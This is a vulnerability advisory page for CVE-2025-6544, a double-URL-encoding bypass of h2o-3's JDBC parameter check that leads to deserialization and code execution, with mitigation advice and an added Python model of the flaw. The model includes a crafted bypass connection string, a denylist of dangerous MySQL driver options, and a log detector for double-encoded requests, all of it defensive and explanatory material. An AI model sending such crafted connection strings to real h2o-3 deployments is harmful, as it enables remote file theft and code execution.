
CVE-2025-6544: CWE-502 Deserialization of Untrusted Data in h2oai h2oai/h2o-3

Critical
Tags: Vulnerability, CVE-2025-6544, CWE-502
Published: Sun Sep 21 2025 (09/21/2025, 09:00:09 UTC)
Source: CVE Database V5
Vendor/Project: h2oai
Product: h2oai/h2o-3

Description

A deserialization vulnerability exists in h2oai/h2o-3 versions <= 3.46.0.8, allowing attackers to read arbitrary system files and execute arbitrary code. The vulnerability arises from improper handling of JDBC connection parameters, which can be exploited by bypassing regular expression checks and using double URL encoding. This issue impacts all users of the affected versions.

AI-Powered Analysis

AI analysis last updated: 09/29/2025, 00:42:57 UTC

Technical Analysis

CVE-2025-6544 is a critical deserialization vulnerability (CWE-502) in h2oai/h2o-3 versions up to and including 3.46.0.8. The flaw lies in how the application handles JDBC connection parameters supplied to it over its network-facing API: the connection string is screened with a regular-expression check, but that check runs on input that has not been canonicalized, so an attacker can hide a disallowed parameter by URL-encoding it twice. One encoding layer is stripped before the regex runs, the check sees only a harmless-looking encoded fragment, and the remaining layer is decoded later, at the point where the value is actually used. Because the connection parameters control how the JDBC driver behaves, a crafted connection string that gets past the check causes the application to deserialize untrusted data, which the advisory reports as arbitrary file read and arbitrary code execution on the h2o-3 host. No authentication or user interaction is required, so the vulnerability is remotely exploitable over the network (AV:N). The CVSS v3.0 base score is 9.8 (critical), with high impact on confidentiality, integrity, and availability: a successful attacker can execute arbitrary commands and read sensitive data on the affected system. No exploitation in the wild has been reported, but the low attack complexity and the severity of the outcome make this a significant threat to every deployment of the affected versions.

Potential Impact

For European organizations, the impact of this vulnerability could be severe, especially for those relying on h2oai/h2o-3 for machine learning, data analytics, or AI-driven decision-making processes. Successful exploitation could lead to full system compromise, data breaches involving sensitive or personal data protected under GDPR, disruption of critical business operations, and potential reputational damage. Given the criticality of the vulnerability and the lack of required authentication, attackers could leverage this flaw to infiltrate networks, move laterally, and establish persistent access. This poses a substantial risk to sectors such as finance, healthcare, telecommunications, and government institutions across Europe, where data confidentiality and system availability are paramount. Additionally, the ability to read arbitrary system files could expose cryptographic keys, credentials, or configuration files, further exacerbating the risk of broader compromise.

Mitigation Recommendations

Organizations should immediately inventory their h2o-3 deployments and identify every instance running version 3.46.0.8 or earlier. No official patch links are listed in this record yet, so monitor the vendor's advisories and release notes and upgrade as soon as a fixed release is available.

Until then, reduce exposure rather than relying on the application's own checks. The bypassed validation lives inside h2o-3, so operators cannot correct it from outside, but they can limit who reaches it and what an exploit can do. Restrict network access to the h2o-3 service to trusted internal networks or a VPN and do not expose it to the internet. Run h2o-3 with one of its authentication mechanisms enabled rather than as an unauthenticated API. Where the JDBC import functionality is not needed, block the corresponding API requests at a reverse proxy; where it is needed, configure the proxy or WAF to reject requests to those endpoints that carry double-encoded input, that is, a percent sign that is itself encoded as %25 followed by two hex digits. Apply egress filtering so the h2o-3 host can only reach the database servers it legitimately uses, since an attacker who controls the JDBC connection string also chooses where the driver connects. Run the service under a least-privilege account with no access to credentials, keys, or configuration it does not need, so that arbitrary file read yields as little as possible.

Complement these controls with monitoring: alert on requests to h2o-3 that contain double-encoded sequences, on the h2o-3 process opening unexpected outbound database connections, and on child processes spawned by the h2o-3 JVM, and keep EDR coverage on the hosts. Finally, make sure incident response plans cover deserialization attacks and that backups are current and stored out of reach of a compromised host.
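The following model, added here as an illustration and not taken from h2o-3's own (Java) code base, shows the mechanism the technical analysis describes and the two controls the mitigation section asks for: a check that canonicalizes before validating, and a log-side detector for double-encoded requests. The denylist regex, the driver option names, the /import_sql endpoint, the allowlist of query keys, and the access-log lines are all assumptions constructed for the example.

```python
"""Added model of the double-URL-encoding bypass described in the analysis
above, together with a hardened check of the kind the mitigation section
asks for. This is illustration code, not h2o-3's own Java implementation:
the denylist regex, the option names, the '/import_sql' endpoint and the
access-log lines are all assumptions constructed for the example."""
import re
from urllib.parse import parse_qsl, unquote

# Assumed denylist of driver options that must never reach the JDBC driver.
# 'autoDeserialize' and 'allowLoadLocalInfile' are real MySQL Connector/J
# option names chosen as plausible entries; the advisory itself names none.
DENY_RE = re.compile(r"autoDeserialize|allowLoadLocalInfile", re.IGNORECASE)

# Values as the request handler sees them after the HTTP layer has
# percent-decoded the parameter once. On the wire the attacker sent
# 'auto%2544eserialize'; that first decode turned it into 'auto%44eserialize',
# and one more decode (assumed to happen downstream, where the URL is actually
# used) yields 'autoDeserialize'.
BENIGN_VALUE = "jdbc:mysql://db.internal:3306/app?user=reporter&useSSL=true"
BYPASS_VALUE = "jdbc:mysql://203.0.113.9:3306/x?user=a&auto%44eserialize=true"


def regex_check(url: str) -> bool:
    """Substring denylist, the kind of check that was bypassed. True = accepted."""
    return DENY_RE.search(url) is None


def vulnerable_pipeline(handler_value: str) -> tuple[bool, str]:
    """Flawed flow: regex on the once-decoded value, then a second decode
    before use. Returns (accepted, url as the driver would see it)."""
    if not regex_check(handler_value):
        return False, handler_value
    return True, unquote(handler_value)


def canonicalize(value: str, max_rounds: int = 5) -> str:
    """Decode until the value stops changing (its fixed point). Input that is
    still changing after max_rounds is treated as hostile."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("percent-decoding did not converge")


# Assumed allowlist of JDBC query keys this deployment actually needs.
ALLOWED_KEYS = frozenset({"user", "password", "usessl", "servertimezone"})


def hardened_pipeline(handler_value: str) -> tuple[bool, str]:
    """Hardened flow: canonicalize first, then allowlist the query keys instead
    of denylisting substrings. Returns (accepted, canonical url)."""
    try:
        url = canonicalize(handler_value)
    except ValueError:
        return False, handler_value
    _, _, query = url.partition("?")
    for key, _ in parse_qsl(query, keep_blank_values=True):
        if key.lower() not in ALLOWED_KEYS:
            return False, url
    return True, url


# Constructed access-log lines for a hypothetical import endpoint.
LOG_LINES = [
    '10.0.0.5 - - [21/Sep/2025:09:00:09 +0000] "POST /import_sql?'
    'connection_url=jdbc:mysql://db.internal:3306/app%3Fuser%3Dreporter HTTP/1.1" 200',
    '198.51.100.7 - - [21/Sep/2025:09:01:13 +0000] "POST /import_sql?'
    'connection_url=jdbc:mysql://203.0.113.9:3306/x%3Fauto%2544eserialize%3Dtrue HTTP/1.1" 200',
]
REQUEST_RE = re.compile(r'"(?:GET|POST) \S*?\?(\S+) HTTP/')


def flag_request_lines(lines):
    """Detection: flag requests whose query string still changes when decoded
    a second time, i.e. carries at least one extra layer of encoding."""
    flagged = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m is None:
            continue
        query = m.group(1)
        if unquote(unquote(query)) != unquote(query):
            flagged.append(line)
    return flagged


if __name__ == "__main__":
    print(vulnerable_pipeline(BYPASS_VALUE))  # accepted; driver sees autoDeserialize=true
    print(hardened_pipeline(BYPASS_VALUE))    # rejected after canonicalization
    print(flag_request_lines(LOG_LINES))      # only the second, double-encoded line
```

The hardened check decodes to a fixed point and then allowlists query keys, so the hidden option is both revealed and rejected, and an input that keeps changing under decoding is refused outright. A stricter variant, closer to the "reject double-encoded inputs" advice above, is to refuse any value whose canonical form differs from the once-decoded value; that also rejects legitimate values containing a literal percent-encoded character, which is why the detector here is written for alerting rather than blocking.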


Technical Details

Data Version
5.1
Assigner Short Name
@huntr_ai
Date Reserved
2025-06-23T18:25:36.504Z
Cvss Version
3.0
State
PUBLISHED

Threat ID: 68d0935fb68a0c387d42a921

Added to database: 9/22/2025, 12:07:59 AM

Last enriched: 9/29/2025, 12:42:57 AM

Last updated: 11/8/2025, 2:04:12 PM

Views: 105
